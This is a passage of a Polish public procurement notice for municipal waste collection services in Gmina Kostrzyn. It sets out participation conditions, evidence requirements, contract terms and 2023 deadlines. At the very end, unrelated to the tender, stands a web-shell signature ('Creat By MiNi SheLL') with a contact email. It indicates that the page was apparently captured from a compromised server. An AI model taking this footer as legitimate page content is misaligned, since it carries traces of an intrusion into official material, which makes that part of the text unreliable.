opisem zamieszczonym poniżej oraz niepodlegający wykluczeniu <br/>z powodu okoliczności o których mowa w rozdziale V SWZ. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>2.1.	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. <br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Wykonawca spełni warunek jeśli wykaże, że posiada:<br/>-	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Kostrzyn zgodnie z wymogami określonymi w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach oraz <br/>-	wpis do rejestru BDO (bazy danych o odpadach) zezwalający na transport odpadów (Wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, o którym mowa w art. 49 i następne ustawy z dnia 14 grudnia 2012 r. o odpadach (tj.: Dz. U. z 2022 r. poz. 699 z późn. zm.), i który to rejestr stanowi element Bazy Danych o Odpadach, w zakresie transportu odpadów). <br/>2.3.	sytuacji ekonomicznej i finansowej: <br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 300.000 zł.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek udziału w postepowaniu musi spełniać co najmniej jeden z Wykonawców.<br/>2.4.	zdolności technicznej lub zawodowej – o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że: <br/>1)	posiadają wiedzę i doświadczenie do wykonania przedmiotu zamówienia – Zamawiający wymaga, aby Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał z należytą starannością co najmniej: <br/>-	jedno zamówienie (w ramach jednej umowy) usługi odbioru, transportu i zagospodarowania odpadów komunalnych polegające na odbiorze, transporcie i zagospodarowaniu odpadów komunalnych od właścicieli nieruchomości zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach oraz ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach o łącznej masie min. 100 Mg- łącznie w danym roku;<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca w Wykazie zrealizowanych usług (załącznik nr 7 do SWZ), wykaże, że w wymaganym okresie – w ramach jednej umowy: zrealizował lub aktualnie realizuje, co najmniej jedno zamówienie dotyczące odbioru, transportu i zagospodarowania odpadów o masie co najmniej 100 Mg w zakresie zgodnym lub szerszym od zakresu przedmiotowego zamówienia oraz załączy do niego dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane w sposób należyty. <br/>UWAGA: Zgodnie z art. 117 ust. 1 Pzp, zamawiający zastrzega, że w przypadku Wykonawców wspólnie ubiegających się o zamówienie, niniejszy warunek nie podlega zsumowaniu, co oznacza, że jeden z wykonawców musi wykazać się całym wymaganym doświadczeniem. <br/>2)	dysponują odpowiednim potencjałem technicznym - Zamawiający wymaga, aby Wykonawca dysponował odpowiednim potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia tj.: <br/>Wykonawca spełni ten warunek jeżeli wykaże, że posiada wyposażenie umożliwiające odebranie odpadów, tj. odpowiednią ilością pojazdów do zbierania odpadów i spełniających wymagania przepisów ochrony środowiska i o ruchu drogowym. Zamawiający wymaga wykazania przez Wykonawcę dysponowania minimum 2 takimi pojazdami.<br/>Zamawiający uzna, za spełniony powyższy warunek, jeżeli Wykonawca w wykazie sprzętu niezbędnego do realizacji zadania wykaże pojazdy niezbędne do realizacji zamówienia (załącznik nr 6 do SWZ), dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz informacją o podstawie do dysponowania tymi zasobami. <br/>-	Wszystkie pojazdy używane podczas realizacji zamówienia muszą spełniać wymogi emisji spalin min. Normę EURO 5.<br/>-	Pojazdy powinny być trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu Wykonawcy.<br/>-	Pojazdy powinny być wyposażone w narzędzia lub urządzenia umożliwiające uprzątnięcie terenu w przypadku jego zanieczyszczenia podczas opróżnienia pojemników. <br/>-	Pojazdy realizujące przedmiot zamówienia muszą być sprawne i muszą posiadać ważne przeglądy techniczne oraz polisy OC i NW; <br/>-	Wykonawca odpowiada za zabezpieczenie pojazdów i urządzeń przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu. W przypadku zanieczyszczenia terenu w wyniku działalności związanej z realizacją przedmiotu zamówienia Wykonawca jest obowiązany do jego natychmiastowego uprzątnięcia. <br/>3)	dysponują osobami zdolnymi do wykonywania zamówienia: <br/>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. <br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim wypadku wykonawcy dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy – załącznik nr 4 do SWZ. <br/>4.	W przypadku posługiwania się przez wykonawcę cudzym potencjałem, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>5.	Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych oraz oświadczeń, potwierdzających okoliczności, o których mowa w art. 125 ust.1 ustawy Pzp - brak podstaw wykluczenia: <br/>a)	oświadczenie Wykonawcy aktualne na dzień złożenia w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej według załącznika nr 8 do SWZ; <br/>b)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego według załącznika nr 9 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych oraz oświadczeń, potwierdzających okoliczności, o których mowa w art. 125 ust.1 ustawy Pzp -spełnianie warunków udziału w postępowaniu: <br/>a)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Kostrzyn zgodnie z wymogami określonymi w ustawie z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach; <br/>b)	wpis do rejestru BDO (bazy danych o odpadach) zezwalający na transport odpadów (Wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, o którym mowa w art. 49 i następne ustawy z dnia 14 grudnia 2012 r. o odpadach i który to rejestr stanowi element Bazy Danych o Odpadach, w zakresie transportu odpadów);<br/>c)	w celu potwierdzenia, że Wykonawca posiada zdolności techniczne i zawodowe Wykonawca przedstawi następujące dokumenty: <br/>- wykaz usług zrealizowanych lub aktualnie realizowanych w ramach jednej umowy- co najmniej jedno zamówienie dotyczące wywozu odpadów w ilości min. 100 Mg łącznie w danym roku w zakresie zgodnym lub szerszym od zakresu przedmiotowego zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy — w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane (zgodnie z załącznikiem nr 7 do SWZ), oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny <br/>o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>-	wykaz sprzętu niezbędnego do realizacji zadania dostępnego wykonawcy w celu wykonania zamówienia publicznego- pojazd niezbędny ro realizacji przedmiotu zamówienia wraz informacją o podstawie do dysponowania tymi zasobami (zgodnie z załącznikiem nr 6 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych w niniejszym postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami rozdziału X SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w załączniku nr 2 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przy użyciu środków komunikacji elektronicznej za pośrednictwem załącznika nr 1 do SWZ - Formularza oferty dostępnego na platformie e-Zamówienia pod adresem: https://ezamowienia.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji przedmiotu zamówienia ustala się na czas 14 dni od dnia podpisania umowy z gotowością od 08.12.2023 r. lub do wyczerpania kwoty wynagrodzenia maksymalnego, w zależności od tego które zdarzenie nastąpi wcześniej.

Creat By MiNi SheLL
Email: jattceo@gmail.com